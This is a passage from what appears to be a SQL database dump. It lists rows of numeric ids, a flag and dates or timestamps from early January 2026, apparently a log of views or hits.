08:15:09'),(100863,5639,1,'2026-01-02','2026-01-02 08:46:41'),(100864,5356,1,'2026-01-02','2026-01-02 08:50:28'),(100865,5125,1,'2026-01-02','2026-01-02 09:12:01'),(100866,3282,1,'2026-01-02','2026-01-02 09:27:44'),(100867,91,1,'2026-01-02','2026-01-02 09:43:02'),(100868,1602,1,'2026-01-02','2026-01-02 11:29:42'),(100869,4950,1,'2026-01-02','2026-01-02 11:52:07'),(100870,3698,1,'2026-01-02','2026-01-02 11:52:24'),(100871,80,1,'2026-01-02','2026-01-02 11:52:27'),(100872,80,1,'2026-01-02','2026-01-02 11:56:58'),(100873,5567,1,'2026-01-02','2026-01-02 12:20:33'),(100874,3251,1,'2026-01-02','2026-01-02 13:32:57'),(100875,2617,1,'2026-01-02','2026-01-02 13:33:12'),(100876,5457,1,'2026-01-02','2026-01-02 14:11:58'),(100877,76,1,'2026-01-02','2026-01-02 14:45:33'),(100878,91,1,'2026-01-02','2026-01-02 14:45:51'),(100879,5415,1,'2026-01-02','2026-01-02 15:28:09'),(100880,5626,1,'2026-01-02','2026-01-02 16:19:48'),(100881,5502,1,'2026-01-02','2026-01-02 17:14:06'),(100882,3069,1,'2026-01-02','2026-01-02 17:22:00'),(100883,3752,1,'2026-01-02','2026-01-02 17:27:10'),(100884,3482,1,'2026-01-02','2026-01-02 17:38:28'),(100885,4660,1,'2026-01-02','2026-01-02 17:38:41'),(100886,5570,1,'2026-01-02','2026-01-02 17:41:44'),(100887,5454,1,'2026-01-02','2026-01-02 17:44:51'),(100888,5425,1,'2026-01-02','2026-01-02 17:52:07'),(100889,4400,1,'2026-01-02','2026-01-02 17:57:18'),(100890,5489,1,'2026-01-02','2026-01-02 18:02:27'),(100891,5412,1,'2026-01-02','2026-01-02 18:03:31'),(100892,2904,1,'2026-01-02','2026-01-02 18:12:01'),(100893,5409,1,'2026-01-02','2026-01-02 18:16:05'),(100894,3038,1,'2026-01-02','2026-01-02 18:16:07'),(100895,2704,1,'2026-01-02','2026-01-02 18:20:34'),(100896,5567,1,'2026-01-02','2026-01-02 18:22:37'),(100897,72,1,'2026-01-02','2026-01-02 18:40:09'),(100898,3267,1,'2026-01-02','2026-01-02 18:44:51'),(100899,5461,1,'2026-01-02','2026-01-02 18:54:39'),(100900,110,1,'2026-01-02','2026-01-02 19:03:59'),(100901,5363,1,'2026-01-02','2026-01-02 20:27:06'),(100902,3083,1,'2026-01-02','2026-01-02 20:31:18'),(100903,4722,1,'2026-01-02','2026-01-02 21:09:44'),(100904,5454,1,'2026-01-02','2026-01-02 21:11:15'),(100905,1772,1,'2026-01-02','2026-01-02 21:12:48'),(100906,5356,1,'2026-01-02','2026-01-02 21:31:33'),(100907,1730,1,'2026-01-02','2026-01-02 21:36:53'),(100908,5626,1,'2026-01-02','2026-01-02 22:03:49'),(100909,5561,1,'2026-01-02','2026-01-02 22:11:58'),(100910,1602,1,'2026-01-02','2026-01-02 22:19:49'),(100911,3541,1,'2026-01-03','2026-01-03 00:24:27'),(100912,1745,1,'2026-01-03','2026-01-03 01:17:43'),(100913,5585,1,'2026-01-03','2026-01-03 01:40:23'),(100914,80,1,'2026-01-03','2026-01-03 02:19:11'),(100915,5397,1,'2026-01-03','2026-01-03 02:21:43'),(100916,5593,1,'2026-01-03','2026-01-03 02:22:53'),(100917,4335,1,'2026-01-03','2026-01-03 02:33:13'),(100918,1778,1,'2026-01-03','2026-01-03 02:34:36'),(100919,2804,1,'2026-01-03','2026-01-03 02:50:51'),(100920,4944,1,'2026-01-03','2026-01-03 03:04:16'),(100921,2148,1,'2026-01-03','2026-01-03 03:05:21'),(100922,3664,1,'2026-01-03','2026-01-03 03:18:28'),(100923,4960,1,'2026-01-03','2026-01-03 03:22:00'),(100924,4911,1,'2026-01-03','2026-01-03 03:27:32'),(100925,4983,1,'2026-01-03','2026-01-03 03:40:29'),(100926,3297,1,'2026-01-03','2026-01-03 03:41:31'),(100927,3777,1,'2026-01-03','2026-01-03 04:13:33'),(100928,3005,1,'2026-01-03','2026-01-03 04:26:33'),(100929,5146,1,'2026-01-03','2026-01-03 04:30:12'),(100930,4719,1,'2026-01-03','2026-01-03 04:38:23'),(100931,2503,1,'2026-01-03','2026-01-03 04:42:40'),(100932,1768,1,'2026-01-03','2026-01-03 04:49:50'),(100933,1730,1,'2026-01-03','2026-01-03 04:56:01'),(100934,4963,1,'2026-01-03','2026-01-03 05:39:48'),(100935,487,1,'2026-01-03','2026-01-03 06:43:19'),(100936,1602,1,'2026-01-03','2026-01-03 07:30:06'),(100937,3742,1,'2026-01-03','2026-01-03 07:45:11'),(100938,4950,1,'2026-01-03','2026-01-03 08:02:05'),(100939,5507,1,'2026-01-03','2026-01-03 08:05:58'),(100940,4785,1,'2026-01-03','2026-01-03 08:42:45'),(100941,5337,1,'2026-01-03','2026-01-03 09:30:02'),(100942,485,1,'2026-01-03','2026-01-03 09:39:54'),(100943,3710,1,'2026-01-03','2026-01-03 10:09:39'),(100944,5122,1,'2026-01-03','2026-01-03 10:36:34'),(100945,5122,1,'2026-01-03','2026-01-03 10:36:35'),(100946,5122,1,'2026-01-03','2026-01-03 10:36:37'),(100947,91,1,'2026-01-03','2026-01-03 10:46:19'),(100948,3005,1,'2026-01-03','2026-01-03 12:11:39'),(100949,467,1,'2026-01-03','2026-01-03 13:21:47'),(100950,5662,1,'2026-01-03','2026-01-03 13:40:15'),(100951,3124,1,'2026-01-03','2026-01-03 13:47:30'),(100952,68,1,'2026-01-03','2026-01-03 15:04:41'),(100953,5295,1,'2026-01-03','2026-01-03 15:11:25'),(100954,5146,1,'2026-01-03','2026-01-03 15:50:44'),(100955,2769,1,'2026-01-03','2026-01-03 16:38:24'),(100956,4950,1,'2026-01-03','2026-01-03 17:13:27'),(100957,3781,1,'2026-01-03','2026-01-03 17:19:08'),(100958,3069,1,'2026-01-03','2026-01-03 17:20:24'),(100959,5433,1,'2026-01-03','2026-01-03 17:24:47'),(100960,5436,1,'2026-01-03','2026-01-03 17:26:33'),(100961,3752,1,'2026-01-03','2026-01-03 17:26:34'),(100962,5570,1,'2026-01-03','2026-01-03 17:38:55'),(100963,4529,1,'2026-01-03','2026-01-03 17:47:13'),(100964,5425,1,'2026-01-03','2026-01-03 17:49:26'),(100965,5578,1,'2026-01-03','2026-01-03 17:52:24'),(100966,5406,1,'2026-01-03','2026-01-03 18:04:55'),(100967,2904,1,'2026-01-03','2026-01-03 18:07:59'),(100968,5428,1,'2026-01-03','2026-01-03 18:10:04'),(100969,3038,1,'2026-01-03','2026-01-03 18:11:12'),(100970,5409,1,'2026-01-03','2026-01-03 18:11:13'),(100971,5567,1,'2026-01-03','2026-01-03 18:17:39'),(100972,3045,1,'2026-01-03','2026-01-03 18:20:59'),(100973,4977,1,'2026-01-03','2026-01-03 18:26:22'),(100974,5449,1,'2026-01-03','2026-01-03 18:34:12'),(100975,72,1,'2026-01-03','2026-01-03 18:35:17'),(100976,4983,1,'2026-01-03','2026-01-03 18:43:36'),(100977,4681,1,'2026-01-03','2026-01-03 19:00:10'),(100978,5464,1,'2026-01-03','2026-01-03 19:01:11'),(100979,4712,1,'2026-01-03','2026-01-03 19:02:13'),(100980,1602,1,'2026-01-03','2026-01-03 19:24:19'),(100981,5449,1,'2026-01-03','2026-01-03 20:08:00'),(100982,5649,1,'2026-01-03','2026-01-03 20:16:57'),(100983,5674,1,'2026-01-03','2026-01-03 21:07:22'),(100984,5412,1,'2026-01-03','2026-01-03 21:24:42'),(100985,5570,1,'2026-01-03','2026-01-03 22:27:14'),(100986,4938,1,'2026-01-03','2026-01-03 22:56:39'),(100987,1614,1,'2026-01-03','2026-01-03 23:58:31'),(100988,1697,1,'2026-01-04','2026-01-04 01:21:47'),(100989,4618,1,'2026-01-04','2026-01-04 03:02:10'),(100990,4338,1,'2026-01-04','2026-01-04 03:03:02'),(100991,5259,1,'2026-01-04','2026-01-04 03:25:05'),(100992,1739,1,'2026-01-04','2026-01-04 03:44:14'),(100993,72,1,'2026-01-04','2026-01-04 03:47:39'),(100994,5631,1,'2026-01-04','2026-01-04 04:10:28'),(100995,5522,1,'2026-01-04','2026-01-04 04:11:33'),(100996,5631,1,'2026-01-04','2026-01-04 04:54:24'),(100997,4950,1,'2026-01-04','2026-01-04 04:57:30'),(100998,4960,1,'2026-01-04','2026-01-04 05:02:51'),(100999,5522,1,'2026-01-04','2026-01-04 05:03:46'),(101000,4608,1,'2026-01-04','2026-01-04 05:05:14'),(101001,5062,1,'2026-01-04','2026-01-04 05:20:53'),(101002,4635,1,'2026-01-04','2026-01-04 07:37:07'),(101003,4637,1,'2026-01-04','2026-01-04 08:25:25'),(101004,110,1,'2026-01-04','2026-01-04 09:50:52'),(101005,5457,1,'2026-01-04','2026-01-04 10:13:12'),(101006,91,1,'2026-01-04','2026-01-04 10:14:33'),(101007,1715,1,'2026-01-04','2026-01-04 10:28:25'),(101008,4335,1,'2026-01-04','2026-01-04 10:28:55'),(101009,5593,1,'2026-01-04','2026-01-04 10:48:38'),(101010,89,1,'2026-01-04','2026-01-04 11:16:53'),(101011,110,1,'2026-01-04','2026-01-04 11:21:53'),(101012,2769,1,'2026-01-04','2026-01-04 11:35:49'),(101013,110,1,'2026-01-04','2026-01-04 11:43:39'),(101014,4963,1,'2026-01-04','2026-01-04 11:52:26'),(101015,4963,1,'2026-01-04','2026-01-04 11:52:28'),(101016,4963,1,'2026-01-04','2026-01-04 11:52:32'),(101017,5666,1,'2026-01-04','2026-01-04 12:30:26'),(101018,2152,1,'2026-01-04','2026-01-04 12:33:44'),(101019,3004,1,'2026-01-04','2026-01-04 14:03:23'),(101020,4963,1,'2026-01-04','2026-01-04 14:04:56'),(101021,110,1,'2026-01-04','2026-01-04 14:41:02'),(101022,5549,1,'2026-01-04','2026-01-04 15:59:52'),(101023,4944,1,'2026-01-04','2026-01-04 16:20:54'),(101024,5522,1,'2026-01-04','2026-01-04 16:37:20'),(101025,4963,1,'2026-01-04','2026-01-04 17:47:25'),(101026,2309,1,'2026-01-04','2026-01-04 18:06:54'),(101027,2309,1,'2026-01-04','2026-01-04 18:06:56'),(101028,3479,1,'2026-01-04','2026-01-04 18:09:49'),(101029,5080,1,'2026-01-04','2026-01-04 18:15:39'),(101030,5502,1,'2026-01-04','2026-01-04 18:20:57'),(101031,3297,1,'2026-01-04','2026-01-04 18:31:42'),(101032,3307,1,'2026-01-04','2026-01-04 18:34:42'),(101033,2804,1,'2026-01-04','2026-01-04 18:49:42'),(101034,4960,1,'2026-01-04','2026-01-04 19:10:37'),(101035,3124,1,'2026-01-04','2026-01-04 19:27:34'),(101036,5397,1,'2026-01-04','2026-01-04 20:04:01'),(101037,1588,1,'2026-01-04','2026-01-04 20:14:19'),(101038,3045,1,'2026-01-04','2026-01-04 20:24:33'),(101039,4966,1,'2026-01-04','2026-01-04 20:33:45'),(101040,4335,1,'2026-01-04','2026-01-04 20:39:21'),(101041,5515,1,'2026-01-04','2026-01-04 20:39:54'),(101042,3742,1,'2026-01-04','2026-01-04 21:00:16'),(101043,4802,1,'2026-01-04','2026-01-04 22:31:16'),(101044,80,1,'2026-01-04','2026-01-04 22:34:59'),(101045,5457,1,'2026-01-04','2026-01-04 22:57:19'),(101046,473,1,'2026-01-04','2026-01-04 23:14:41'),(101047,472,1,'2026-01-04','2026-01-04 23:16:00'),(101048,471,1,'2026-01-04','2026-01-04 23:17:47'),(101049,4660,1,'2026-01-04','2026-01-04 23:26:39'),(101050,3307,1,'2026-01-04','2026-01-04 23:31:43'),(101051,3307,1,'2026-01-04','2026-01-04 23:31:45'),(101052,4618,1,'2026-01-05','2026-01-05 00:28:13'),(101053,4448,1,'2026-01-05','2026-01-05 01:09:40'),(101054,5050,1,'2026-01-05','2026-01-05 01:17:01'),(101055,1612,1,'2026-01-05','2026-01-05 01:31:52'),(101056,74,1,'2026-01-05','2026-01-05 01:44:10'),(101057,5649,1,'2026-01-05','2026-01-05 02:02:22'),(101058,2297,1,'2026-01-05','2026-01-05 02:38:23'),(101059,4960,1,'2026-01-05','2026-01-05 05:17:59'),(101060,4960,1,'2026-01-05','2026-01-05 05:18:00'),(101061,4960,1,'2026-01-05','2026-01-05 05:18:01'),(101062,4963,1,'2026-01-05','2026-01-05 05:28:57'),(101063,3124,1,'2026-01-05','2026-01-05 05:31:28'),(101064,5295,1,'2026-01-05','2026-01-05 05:39:58'),(101065,4719,1,'2026-01-05','2026-01-05 05:59:00'),(101066,89,1,'2026-01-05','2026-01-05 06:03:39'),(101067,5146,1,'2026-01-05','2026-01-05 06:19:00'),(101068,5163,1,'2026-01-05','2026-01-05 06:21:19'),(101069,2804,1,'2026-01-05','2026-01-05 06:29:54'),(101070,5378,1,'2026-01-05','2026-01-05 07:06:37'),(101071,4938,1,'2026-01-05','2026-01-05 07:45:33'),(101072,3083,1,'2026-01-05','2026-01-05 07:46:27'),(101073,1582,1,'2026-01-05','2026-01-05 09:18:06'),(101074,5561,1,'2026-01-05','2026-01-05 09:31:59'),(101075,5441,1,'2026-01-05','2026-01-05 09:36:39'),(101076,5125,1,'2026-01-05','2026-01-05 09:39:14'),(101077,5626,1,'2026-01-05','2026-01-05 09:48:34'),(101078,1544,1,'2026-01-05','2026-01-05 10:16:39'),(101079,4436,1,'2026-01-05','2026-01-05 10:21:47'),(101080,3749,1,'2026-01-05','2026-01-05 10:26:51'),(101081,91,1,'2026-01-05','2026-01-05 10:35:24'),(101082,4556,1,'2026-01-05','2026-01-05 11:15:18'),(101083,4950,1,'2026-01-05','2026-01-05 11:21:08'),(101084,5080,1,'2026-01-05','2026-01-05 11:21:32'),(101085,5495,1,'2026-01-05','2026-01-05 11:33:17'),(101086,1586,1,'2026-01-05','2026-01-05 11:58:30'),(101087,1586,1,'2026-01-05','2026-01-05 11:59:22'),(101088,4802,1,'2026-01-05','2026-01-05 12:12:01'),(101089,84,1,'2026-01-05','2026-01-05 12:19:41'),(101090,87,1,'2026-01-05','2026-01-05 12:19:44'),(101091,89,1,'2026-01-05','2026-01-05 12:19:47'),(101092,68,1,'2026-01-05','2026-01-05 13:12:40'),(101093,5639,1,'2026-01-05','2026-01-05 14:04:26'),(101094,5639,1,'2026-01-05','2026-01-05 14:49:23'),(101095,76,1,'2026-01-05','2026-01-05 15:13:49'),(101096,5682,1,'2026-01-05','2026-01-05 15:16:29'),(101097,5639,1,'2026-01-05','2026-01-05 15:20:17'),(101098,3265,1,'2026-01-05','2026-01-05 16:09:18'),(101099,1734,1,'2026-01-05','2026-01-05 16:16:56'),(101100,5518,1,'2026-01-05','2026-01-05 16:28:16'),(101101,4335,1,'2026-01-05','2026-01-05 16:37:11'),(101102,5626,1,'2026-01-05','2026-01-05 16:39:07'),(101103,5436,1,'2026-01-05','2026-01-05 16:44:02'),(101104,473,1,'2026-01-05','2026-01-05 16:58:09'),(101105,472,1,'2026-01-05','2026-01-05 16:58:32'),(101106,3005,1,'2026-01-05','2026-01-05 17:05:10'),(101107,4960,1,'2026-01-05','2026-01-05 17:10:29'),(101108,5420,1,'2026-01-05','2026-01-05 17:18:56'),(101109,1768,1,'2026-01-05','2026-01-05 17:23:49'),(101110,1730,1,'2026-01-05','2026-01-05 17:29:01'),(101111,2989,1,'2026-01-05','2026-01-05 17:40:35'),(101112,5314,1,'2026-01-05','2026-01-05 18:18:03'),(101113,5502,1,'2026-01-05','2026-01-05 18:33:01'),(101114,2991,1,'2026-01-05','2026-01-05 18:34:26'),(101115,3307,1,'2026-01-05','2026-01-05 18:40:47'),(101116,5406,1,'2026-01-05','2026-01-05 18:56:49'),(101117,5461,1,'2026-01-05','2026-01-05 19:49:28'),(101118,3486,1,'2026-01-05','2026-01-05 19:55:36'),(101119,5397,1,'2026-01-05','2026-01-05 19:58:39'),(101120,5626,1,'2026-01-05','2026-01-05 20:33:42'),(101121,5433,1,'2026-01-05','2026-01-05 20:37:47'),(101122,5492,1,'2026-01-05','2026-01-05 20:41:51'),(101123,2704,1,'2026-01-05','2026-01-05 21:03:55'),(101124,1586,1,'2026-01-05','2026-01-05 21:13:47'),(101125,110,1,'2026-01-05','2026-01-05 21:44:21'),(101126,5457,1,'2026-01-05','2026-01-05 22:08:44'),(101127,4944,1,'2026-01-05','2026-01-05 23:11:31'),(101128,3038,1,'2026-01-05','2026-01-05 23:12:42'),(101129,2159,1,'2026-01-05','2026-01-05 23:15:40'),(101130,80,1,'2026-01-06','2026-01-06 00:17:00'),(101131,5421,1,'2026-01-06','2026-01-06 00:21:17'),(101132,5639,1,'2026-01-06','2026-01-06 01:01:27'),(101133,5400,1,'2026-01-06','2026-01-06 01:07:09'),(101134,4335,1,'2026-01-06','2026-01-06 01:15:55'),(101135,89,1,'2026-01-06','2026-01-06 01:42:10'),(101136,5428,1,'2026-01-06','2026-01-06 01:48:58'),(101137,5425,1,'2026-01-06','2026-01-06 01:50:17'),(101138,84,1,'2026-01-06','2026-01-06 01:50:18'),(101139,4301,1,'2026-01-06','2026-01-06 02:14:52'),(101140,1877,1,'2026-01-06','2026-01-06 02:19:57'),(101141,470,1,'2026-01-06','2026-01-06 03:09:12'),(101142,1699,1,'2026-01-06','2026-01-06 03:13:19'),(101143,4858,1,'2026-01-06','2026-01-06 03:13:23'),(101144,5461,1,'2026-01-06','2026-01-06 03:14:23'),(101145,4400,1,'2026-01-06','2026-01-06 03:37:00'),(101146,5400,1,'2026-01-06','2026-01-06 04:17:15'),(101147,5526,1,'2026-01-06','2026-01-06 04:29:35'),(101148,5489,1,'2026-01-06','2026-01-06 05:14:39'),(101149,3710,1,'2026-01-06','2026-01-06 05:21:49'),(101150,4950,1,'2026-01-06','2026-01-06 05:24:08'),(101151,87,1,'2026-01-06','2026-01-06 05:24:36'),(101152,76,1,'2026-01-06','2026-01-06 05:25:44'),(101153,68,1,'2026-01-06','2026-01-06 05:26:00'),(101154,89,1,'2026-01-06','2026-01-06 05:26:08'),(101155,4950,1,'2026-01-06','2026-01-06 05:34:44'),(101156,1602,1,'2026-01-06','2026-01-06 05:42:01'),(101157,5436,1,'2026-01-06','2026-01-06 05:42:55'),(101158,1780,1,'2026-01-06','2026-01-06 06:37:03'),(101159,72,1,'2026-01-06','2026-01-06 07:05:27'),(101160,5412,1,'2026-01-06','2026-01-06 07:32:41'),(101161,2904,1,'2026-01-06','2026-01-06 08:49:44'),(101162,1600,1,'2026-01-06','2026-01-06 08:53:13'),(101163,5428,1,'2026-01-06','2026-01-06 09:01:58'),(101164,5561,1,'2026-01-06','2026-01-06 09:36:56'),(101165,5441,1,'2026-01-06','2026-01-06 09:39:54'),(101166,2993,1,'2026-01-06','2026-01-06 10:16:40'),(101167,3287,1,'2026-01-06','2026-01-06 11:37:34'),(101168,5567,1,'2026-01-06','2026-01-06 11:39:36'),(101169,5692,1,'2026-01-06','2026-01-06 12:00:08'),(101170,5692,1,'2026-01-06','2026-01-06 12:20:27'),(101171,5692,1,'2026-01-06','2026-01-06 12:20:28'),(101172,5692,1,'2026-01-06','2026-01-06 12:20:35'),(101173,5397,1,'2026-01-06','2026-01-06 12:20:39'),(101174,5397,1,'2026-01-06','2026-01-06 12:34:40'),(101175,5397,1,'2026-01-06','2026-01-06 12:36:15'),(101176,3045,1,'2026-01-06','2026-01-06 12:41:53'),(101177,84,1,'2026-01-06','2026-01-06 13:21:54'),(101178,4950,1,'2026-01-06','2026-01-06 14:29:11'),(101179,4950,1,'2026-01-06','2026-01-06 14:34:03'),(101180,4883,1,'2026-01-06','2026-01-06 14:54:31'),(101181,4338,1,'2026-01-06','2026-01-06 14:54:35'),(101182,5314,1,'2026-01-06','2026-01-06 15:22:12'),(101183,5598,1,'2026-01-06','2026-01-06 15:33:16'),(101184,4950,1,'2026-01-06','2026-01-06 15:42:04'),(101185,4930,1,'2026-01-06','2026-01-06 15:42:59'),(101186,4950,1,'2026-01-06','2026-01-06 15:43:16'),(101187,4950,1,'2026-01-06','2026-01-06 15:59:59'),(101188,4950,1,'2026-01-06','2026-01-06 16:00:00'),(101189,68,1,'2026-01-06','2026-01-06 16:00:16'),(101190,3278,1,'2026-01-06','2026-01-06 18:13:47'),(101191,2751,1,'2026-01-06','2026-01-06 18:16:26'),(101192,89,1,'2026-01-06','2026-01-06 18:17:53'),(101193,2993,1,'2026-01-06','2026-01-06 18:45:19'),(101194,4963,1,'2026-01-06','2026-01-06 19:32:20'),(101195,5631,1,'2026-01-06','2026-01-06 19:32:27'),(101196,89,1,'2026-01-06','2026-01-06 19:32:59'),(101197,4950,1,'2026-01-06','2026-01-06 19:45:27'),(101198,4950,1,'2026-01-06','2026-01-06 19:46:34'),(101199,4941,1,'2026-01-06','2026-01-06 20:17:29'),(101200,5436,1,'2026-01-06','2026-01-06 20:50:20'),(101201,4911,1,'2026-01-06','2026-01-06 20:50:48'),(101202,72,1,'2026-01-06','2026-01-06 21:26:12'),(101203,5692,1,'2026-01-06','2026-01-06 21:27:05'),(101204,5692,1,'2026-01-06','2026-01-06 21:30:14'),(101205,1695,1,'2026-01-06','2026-01-06 21:47:26'),(101206,2457,1,'2026-01-06','2026-01-06 21:56:18'),(101207,5420,1,'2026-01-06','2026-01-06 21:59:38'),(101208,3664,1,'2026-01-06','2026-01-06 22:39:42'),(101209,4950,1,'2026-01-06','2026-01-06 22:43:27'),(101210,76,1,'2026-01-06','2026-01-06 22:45:11'),(101211,4832,1,'2026-01-06','2026-01-06 22:52:56'),(101212,5692,1,'2026-01-06','2026-01-06 22:53:50'),(101213,4520,1,'2026-01-06','2026-01-06 23:05:28'),(101214,3781,1,'2026-01-06','2026-01-06 23:57:16'),(101215,4960,1,'2026-01-07','2026-01-07 00:08:45'),(101216,4454,1,'2026-01-07','2026-01-07 00:21:52'),(101217,4420,1,'2026-01-07','2026-01-07 00:49:39'),(101218,5526,1,'2026-01-07','2026-01-07 01:09:35'),(101219,4983,1,'2026-01-07','2026-01-07 01:56:39'),(101220,5515,1,'2026-01-07','2026-01-07 01:59:42'),(101221,4950,1,'2026-01-07','2026-01-07 02:36:20'),(101222,5454,1,'2026-01-07','2026-01-07 02:52:50'),(101223,3752,1,'2026-01-07','2026-01-07 03:00:06'),(101224,3486,1,'2026-01-07','2026-01-07 03:57:20'),(101225,5601,1,'2026-01-07','2026-01-07 05:02:21'),(101226,80,1,'2026-01-07','2026-01-07 05:31:08'),(101227,1612,1,'2026-01-07','2026-01-07 05:36:49'),(101228,480,1,'2026-01-07','2026-01-07 06:16:45'),(101229,4963,1,'2026-01-07','2026-01-07 06:23:02'),(101230,5512,1,'2026-01-07','2026-01-07 06:55:24'),(101231,2801,1,'2026-01-07','2026-01-07 07:07:37'),(101232,3038,1,'2026-01-07','2026-01-07 07:18:35'),(101233,2804,1,'2026-01-07','2026-01-07 07:34:32'),(101234,5400,1,'2026-01-07','2026-01-07 09:42:11'),(101235,570,1,'2026-01-07','2026-01-07 10:07:29'),(101236,5692,1,'2026-01-07','2026-01-07 10:28:02'),(101237,5692,1,'2026-01-07','2026-01-07 10:28:02'),(101238,3124,1,'2026-01-07','2026-01-07 10:32:30'),(101239,4729,1,'2026-01-07','2026-01-07 10:34:57'),(101240,4950,1,'2026-01-07','2026-01-07 10:40:18'),(101241,80,1,'2026-01-07','2026-01-07 10:40:38'),(101242,5692,1,'2026-01-07','2026-01-07 10:44:05'),(101243,5692,1,'2026-01-07','2026-01-07 10:44:45'),(101244,5692,1,'2026-01-07','2026-01-07 10:45:59'),(101245,5692,1,'2026-01-07','2026-01-07 10:46:54'),(101246,5692,1,'2026-01-07','2026-01-07 10:47:19'),(101247,5692,1,'2026-01-07','2026-01-07 10:50:59'),(101248,5692,1,'2026-01-07','2026-01-07 10:51:42'),(101249,5692,1,'2026-01-07','2026-01-07 10:56:10'),(101250,5692,1,'2026-01-07','2026-01-07 10:58:52'),(101251,5692,1,'2026-01-07','2026-01-07 11:02:30'),(101252,5692,1,'2026-01-07','2026-01-07 11:02:30'),(101253,5692,1,'2026-01-07','2026-01-07 11:03:45'),(101254,5657,1,'2026-01-07','2026-01-07 11:05:04'),(101255,5406,1,'2026-01-07','2026-01-07 11:09:54'),(101256,5570,1,'2026-01-07','2026-01-07 11:17:20'),(101257,5692,1,'2026-01-07','2026-01-07 11:20:09'),(101258,5692,1,'2026-01-07','2026-01-07 11:24:30'),(101259,5692,1,'2026-01-07','2026-01-07 11:29:26'),(101260,5692,1,'2026-01-07','2026-01-07 11:32:36'),(101261,5692,1,'2026-01-07','2026-01-07 11:32:42'),(101262,5692,1,'2026-01-07','2026-01-07 11:33:42'),(101263,5692,1,'2026-01-07','2026-01-07 11:36:01'),(101264,5692,1,'2026-01-07','2026-01-07 11:37:07'),(101265,5692,1,'2026-01-07','2026-01-07 11:37:27'),(101266,5692,1,'2026-01-07','2026-01-07 11:42:32'),(101267,5692,1,'2026-01-07','2026-01-07 11:51:14'),(101268,5626,1,'2026-01-07','2026-01-07 11:57:38'),(101269,1608,1,'2026-01-07','2026-01-07 12:13:07'),(101270,2148,1,'2026-01-07','2026-01-07 12:15:31'),(101271,3092,1,'2026-01-07','2026-01-07 12:15:32'),(101272,5692,1,'2026-01-07','2026-01-07 12:21:27'),(101273,5464,1,'2026-01-07','2026-01-07 12:32:32'),(101274,5692,1,'2026-01-07','2026-01-07 12:40:59'),(101275,5692,1,'2026-01-07','2026-01-07 13:04:04'),(101276,4712,1,'2026-01-07','2026-01-07 13:16:29'),(101277,467,1,'2026-01-07','2026-01-07 13:25:36'),(101278,4963,1,'2026-01-07','2026-01-07 13:29:52'),(101279,5454,1,'2026-01-07','2026-01-07 13:31:35'),(101280,89,1,'2026-01-07','2026-01-07 14:36:06'),(101281,5692,1,'2026-01-07','2026-01-07 15:47:43'),(101282,5692,1,'2026-01-07','2026-01-07 15:52:51'),(101283,1770,1,'2026-01-07','2026-01-07 16:33:04'),(101284,4529,1,'2026-01-07','2026-01-07 16:55:25'),(101285,5692,1,'2026-01-07','2026-01-07 18:00:55'),(101286,5692,1,'2026-01-07','2026-01-07 18:01:43'),(101287,3781,1,'2026-01-07','2026-01-07 18:19:22'),(101288,5122,1,'2026-01-07','2026-01-07 18:21:46'),(101289,5122,1,'2026-01-07','2026-01-07 18:21:48'),(101290,5122,1,'2026-01-07','2026-01-07 18:21:48'),(101291,5692,1,'2026-01-07','2026-01-07 18:42:05'),(101292,5054,1,'2026-01-07','2026-01-07 18:57:38'),(101293,4963,1,'2026-01-07','2026-01-07 19:11:21'),(101294,3781,1,'2026-01-07','2026-01-07 19:20:16'),(101295,3781,1,'2026-01-07','2026-01-07 19:20:18'),(101296,5578,1,'2026-01-07','2026-01-07 19:54:39'),(101297,5692,1,'2026-01-07','2026-01-07 19:57:08'),(101298,5502,1,'2026-01-07','2026-01-07 20:14:58'),(101299,4685,1,'2026-01-07','2026-01-07 20:59:18'),(101300,5454,1,'2026-01-07','2026-01-07 21:33:19'),(101301,3781,1,'2026-01-07','2026-01-07 22:40:46'),(101302,4963,1,'2026-01-07','2026-01-07 22:43:59'),(101303,4963,1,'2026-01-07','2026-01-07 23:06:39'),(101304,4963,1,'2026-01-07','2026-01-07 23:07:44'),(101305,4722,1,'2026-01-07','2026-01-07 23:09:18'),(101306,5696,1,'2026-01-07','2026-01-07 23:10:20'),(101307,5696,1,'2026-01-07','2026-01-07 23:11:23'),(101308,5412,1,'2026-01-07','2026-01-07 23:20:29'),(101309,3069,1,'2026-01-07','2026-01-07 23:22:44'),(101310,5515,1,'2026-01-08','2026-01-08 00:32:46'),(101311,3673,1,'2026-01-08','2026-01-08 00:33:25'),(101312,5406,1,'2026-01-08','2026-01-08 01:03:18'),(101313,5433,1,'2026-01-08','2026-01-08 01:05:22'),(101314,3752,1,'2026-01-08','2026-01-08 01:33:58'),(101315,3117,1,'2026-01-08','2026-01-08 01:42:12'),(101316,5484,1,'2026-01-08','2026-01-08 02:25:10'),(101317,3307,1,'2026-01-08','2026-01-08 02:43:48'),(101318,3307,1,'2026-01-08','2026-01-08 02:43:50'),(101319,3307,1,'2026-01-08','2026-01-08 02:43:51'),(101320,2904,1,'2026-01-08','2026-01-08 03:02:00'),(101321,5692,1,'2026-01-08','2026-01-08 04:06:25'),(101322,3038,1,'2026-01-08','2026-01-08 04:45:13'),(101323,5409,1,'2026-01-08','2026-01-08 04:58:30'),(101324,4960,1,'2026-01-08','2026-01-08 05:02:15'),(101325,5441,1,'2026-01-08','2026-01-08 05:24:58'),(101326,5125,1,'2026-01-08','2026-01-08 05:33:07'),(101327,4496,1,'2026-01-08','2026-01-08 06:15:10'),(101328,5457,1,'2026-01-08','2026-01-08 06:32:19'),(101329,5461,1,'2026-01-08','2026-01-08 08:24:38'),(101330,4660,1,'2026-01-08','2026-01-08 08:52:49'),(101331,91,1,'2026-01-08','2026-01-08 08:59:58'),(101332,4960,1,'2026-01-08','2026-01-08 09:08:00'),(101333,4960,1,'2026-01-08','2026-01-08 09:08:03'),(101334,5570,1,'2026-01-08','2026-01-08 09:08:45'),(101335,2813,1,'2026-01-08','2026-01-08 09:22:15'),(101336,2152,1,'2026-01-08','2026-01-08 09:23:57'),(101337,471,1,'2026-01-08','2026-01-08 09:41:46'),(101338,5406,1,'2026-01-08','2026-01-08 09:57:37'),(101339,5409,1,'2026-01-08','2026-01-08 09:58:18'),(101340,5406,1,'2026-01-08','2026-01-08 09:59:45'),(101341,1584,1,'2026-01-08','2026-01-08 10:18:02'),(101342,3178,1,'2026-01-08','2026-01-08 10:25:23'),(101343,3691,1,'2026-01-08','2026-01-08 10:26:35'),(101344,4950,1,'2026-01-08','2026-01-08 10:28:05'),(101345,5626,1,'2026-01-08','2026-01-08 10:38:14'),(101346,3791,1,'2026-01-08','2026-01-08 11:04:43'),(101347,4911,1,'2026-01-08','2026-01-08 